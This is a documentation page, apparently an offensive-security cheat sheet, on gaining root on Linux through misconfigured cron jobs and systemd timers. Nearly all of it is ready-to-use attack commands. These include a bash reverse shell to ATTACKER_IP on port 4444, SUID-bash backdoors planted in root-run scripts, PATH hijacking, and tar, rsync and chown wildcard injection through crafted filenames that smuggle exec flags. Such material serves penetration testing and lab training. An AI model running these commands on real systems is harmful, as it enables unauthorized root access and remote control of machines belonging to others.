Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Enumerate Cron Jobs

crontab -l
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
cat /var/spool/cron/crontabs/* 2>/dev/null

Watch for Cron Execution (pspy)

./pspy64
Look for commands run by UID 0 (root).

Writable Cron Scripts

If a cron job runs a script as root and you can write to it:

Check Permissions

ls -la /path/to/cron-script.sh

Inject Reverse Shell

echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/cron-script.sh

Inject SUID bash

echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /path/to/cron-script.sh
Wait for cron → then: 
/tmp/rootbash -p

PATH Hijacking

If /etc/crontab has a writable directory in PATH before system dirs: 
# Example /etc/crontab:
# PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin
# * * * * * root backup.sh
If cron calls backup.sh without full path and /home/user is writable: 
echo '#!/bin/bash' > /home/user/backup.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/backup.sh
chmod +x /home/user/backup.sh

Wildcard Injection

tar Wildcard

If cron runs: 
cd /home/user && tar czf /tmp/backup.tar.gz *
The * expands filenames as arguments. Create files that become tar flags: 
echo '' > '/home/user/--checkpoint=1'
echo '' > '/home/user/--checkpoint-action=exec=sh shell.sh'
echo '#!/bin/bash' > /home/user/shell.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/shell.sh
chmod +x /home/user/shell.sh

rsync Wildcard

If cron runs: 
rsync -a /home/user/* /backup/

echo '' > '/home/user/-e sh shell.sh'
echo '#!/bin/bash' > /home/user/shell.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/shell.sh
chmod +x /home/user/shell.sh

chown Wildcard

If cron runs: 
chown root:root /home/user/*

echo '' > '/home/user/--reference=/etc/passwd'

Writable Cron Directory

If /etc/cron.d/ is writable: 
echo '* * * * * root cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > /etc/cron.d/privesc

Systemd Timers

systemctl list-timers --all
Check service file for writable script: 
systemctl cat <timer-name>.service
If ExecStart points to writable file → inject payload.

Overwrite /etc/crontab

If /etc/crontab is writable: 
echo '* * * * * root /tmp/shell.sh' >> /etc/crontab